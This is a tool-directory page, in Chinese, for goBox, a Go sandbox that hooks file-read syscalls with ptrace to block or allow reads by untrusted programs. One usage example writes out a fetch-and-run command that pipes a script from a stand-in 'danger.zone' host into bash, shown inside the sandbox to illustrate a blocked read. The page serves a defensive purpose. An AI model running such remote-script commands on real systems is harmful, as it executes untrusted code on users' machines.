Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
goBox — Go 沙箱,用于运行不可信代码 | Kitploit
工具/GitHubGitHub/nishitm/gobox
动态分析 (沙盒)安全虚拟化实用工具与框架
GitHubnishitm/gobox

goBox

Go 沙箱,用于运行不可信代码

查看仓库
4286年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

goBox

用于运行不可信代码的 GO 沙箱。

goBox 使用 Ptrace 挂钩 READ 系统调用,让你可以选择在执行前接受或拒绝系统调用。

用法

root@kitploit:~
Usage of ./gobox:

  gobox [FLAGS] command

  flags:
    -h	Print Usage.
    -n value
        A glob pattern for automatically blocking file reads.
    -y value
        A glob pattern for automatically allowing file reads.

使用场景

你想安装任何东西

root@kitploit:~
> gobox -n "/etc/password.txt" npm install sketchy-module

  BLOCKED READ on /etc/password.txt
root@kitploit:~
> gobox -n "/etc/password.txt" bash <(curl  https://danger.zone/install.sh)

  BLOCKED READ on /etc/password.txt

你感兴趣于你最喜欢的程序进行了哪些文件读取。

当然你可以使用 strace,但它引用的是文件描述符,而 goBox 通过打印文件描述符的绝对路径,让你一眼就能看出文件读取情况。

root@kitploit:~
> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

注意:加密所有敏感数据绝对是更好的主意,goBox 可能只应在加密不方便或不切实际时使用。

注意:我没有为跨平台兼容性做任何努力,所以它目前只适用于 Linux。我很乐意接受补丁来改进可移植性。

下载工具